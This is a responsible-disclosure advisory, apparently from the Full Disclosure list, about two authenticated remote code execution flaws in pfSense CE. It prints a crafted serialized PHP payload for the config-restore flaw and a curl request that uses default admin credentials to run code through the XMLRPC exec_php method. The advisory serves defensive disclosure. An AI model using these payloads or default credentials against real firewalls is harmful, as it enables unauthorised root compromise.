Advisory: Authenticated Remote Code Execution in pfSense CECVEs: CVE-2025-69690, CVE-2025-69691 Researcher: Nelson Adhepeau ([email protected]) Date: February 2026
== RESPONSIBLE DISCLOSURE NOTICE ==
This advisory is published in accordance with responsible disclosure practices.
The vendor was notified on December 2, 2025, acknowledged the reports, and
indicated no patches would be issued. Publication follows standard 90-day
disclosure guidelines.
-------------------------------------------------------------
== OVERVIEW ==
Two independent authenticated Remote Code Execution
vulnerabilities were discovered in Netgate pfSense Community
Edition. Both were reproduced on clean installations. Vendor
was contacted and acknowledged the reports but classified both
as expected behavior for authenticated administrators.
-------------------------------------------------------------
== CVE-2025-69690 ==
Authenticated RCE via Unsafe Deserialization (pfSense CE 2.7.2)
CVSS v3.1: 8.8 (High)
Vector: AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
CWE-502: Deserialization of Untrusted Data
CWE-915: Improperly Controlled Dynamic Code Evaluation
-- Description --
The pfSense configuration restore mechanism invokes
unserialize() on user-controlled data without class
whitelisting, input validation, or sandboxing.
A crafted backup file containing a malicious serialized PHP
object can inject arbitrary commands via the
post_reboot_commands property, executed through mwexec()
with full root privileges.
-- Affected Component --
backup/restore mechanism, config.php,
pfsense_module_installer class, unserialize() handling
-- Attack Vector --
1. Attacker authenticates as administrator
2. Uploads malicious configuration backup file
3. Triggers restore operation
4. pfSense unserializes attacker-controlled data
5. Commands execute as root via mwexec()
-- PoC Payload --
O:23:"pfsense_module_installer":1:{
s:17:"*post_reboot_commands";
a:1:{i:0;s:40:"/usr/local/bin/php -r 'system(\"id\");'";}}
-- Impact --
- Arbitrary command execution as root
- Persistent compromise
- Complete firewall takeover
- Credential and configuration exfiltration
-- Vendor Response --
Netgate acknowledged the report. Classified as
"authenticated administrative abuse". No patch issued.
Vendor does not assign CVEs directly.
-------------------------------------------------------------
== CVE-2025-69691 ==
Authenticated RCE via XMLRPC exec_php (pfSense CE 2.8.0)
CVSS v3.1: 9.9 (Critical)
Vector: AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-284: Improper Access Control
CWE-915: Improperly Controlled Dynamic Code Evaluation
-- Description --
pfSense CE 2.8.0 exposes an XMLRPC API method
pfsense.exec_php that executes arbitrary PHP code as root
without validation, sandboxing, or restrictions.
The endpoint is enabled by default, accessible over HTTPS
via Basic Authentication, and executes supplied code
immediately with full system privileges. Default credentials
(admin:pfsense) are widely deployed, significantly lowering
the exploitation barrier.
-- Affected Component --
xmlrpc.php, pfsense.exec_php method, XMLRPC API handler,
BasicAuth authentication layer
-- Attack Vector --
curl -k -u admin:pfsense \
-d '<methodCall>
<methodName>pfsense.exec_php</methodName>
<params><param><value><string>
system("id");
</string></value></param></params>
</methodCall>' \
https://<target>/xmlrpc.php
-- Impact --
- Full remote root compromise
- Arbitrary file read/write
- Backdoor deployment
- Firewall rule manipulation
- Extraction of secrets and configurations
-- Vendor Response --
Netgate acknowledged the report. Classified as expected
behavior for authenticated users. No patch in pfSense CE
2.8.0. Still exploitable as of latest version at time
of disclosure.
-------------------------------------------------------------
== TIMELINE ==
- November 2025: Vulnerabilities discovered
- December 2, 2025: Initial report sent to Netgate
- Netgate acknowledged, no patch planned
- January 28, 2026: CVEs assigned by MITRE
- February 2026: Public disclosure
-------------------------------------------------------------
== REFERENCES ==
CVE-2025-69690:
https://cve.org/CVERecord?id=CVE-2025-69690
CVE-2025-69691:
https://cve.org/CVERecord?id=CVE-2025-69691
Researcher:
https://github.com/privlabs
https://linkedin.com/in/nelson-adhepeau
-------------------------------------------------------------
Nelson Adhepeau
Independent Security [email protected]
Envoyé avec un e-mail sécurisé Proton Mail.
signature.asc
Description: OpenPGP digital signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
